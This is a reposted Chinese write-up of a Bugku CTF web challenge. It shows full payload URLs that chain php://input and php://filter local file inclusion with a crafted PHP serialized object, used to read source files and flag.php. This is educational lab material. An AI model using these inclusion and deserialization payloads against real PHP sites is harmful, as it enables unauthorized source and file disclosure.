欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

【Bugku CTF】welcome to bugkuctf 100 writeup

程序员文章站 2022-03-09 22:31:15
...
今天心情有点复杂!!!

0x01 前言

解题链接:http://123.206.87.240:8006/test1/

经过一番资料学习emmmm,此题知识点主要 YOU 代码审计反序列化等,,,,


查看源码

【Bugku CTF】welcome to bugkuctf 100 writeup
代码审计啦
三个GET传参、条件存在userwelcometothebugkuctfuser且内容 welcome to the bugkuctf 、file要求为hint.php

关于php://filter
可以看这位大佬的博客
https://www.leavesongs.com/PENETRATION/php-filter-magic.html

关于php://input
官方描述:
“php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data”

支持的协议和封装协议
https://php.net/manual/zh/wrappers.php

构造payload -------------------------读取hint.php文件内容

http://123.206.87.240:8006/test1/index.php?
txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=

post data : welcome to the bugkuctf

【Bugku CTF】welcome to bugkuctf 100 writeup
base64解密

PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==  
<?php  
  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
			echo "<br>";
		return ("good");
        }  
    }  
}  
?>  

用上面方法读取index.php(原因不知)
【Bugku CTF】welcome to bugkuctf 100 writeup
解码为

<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
		echo "涓嶈兘鐜板湪灏辩粰浣爁lag鍝�";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->  �� 

魔术方法 __tostring() https://www.php.net/manual/zh/language.oop5.magic.php
preg_match https://php.net/manual/zh/function.preg-match.php
unserialize 反序列化 https://blog.csdn.net/wy0123/article/details/79345842 (没了解构造原理找大佬博客)

将hint.php中的Flag方法当做字符串执行时,会自动执行 __tostring方法,只有echo,只能输出一个或多个字符串,所以构造password为Flag类型,其中的string变量password为Flag类型,其中的string变量flie=flag.php即可
注意反序列化
password=unserialize(password=unserialize(password);

因此知道需要构造序列化对象payload

<?php  
    class Flag{
    public $file;    
    }   
    $a = new Flag();  
    $a->file = "flag.php";  
    $a = serialize($a);  
    print_r($a);  
?> 

输出:

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最后payload

/test1/index.php?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

【Bugku CTF】welcome to bugkuctf 100 writeup
向前辈学习:https://blog.csdn.net/csu_vc/article/details/78375203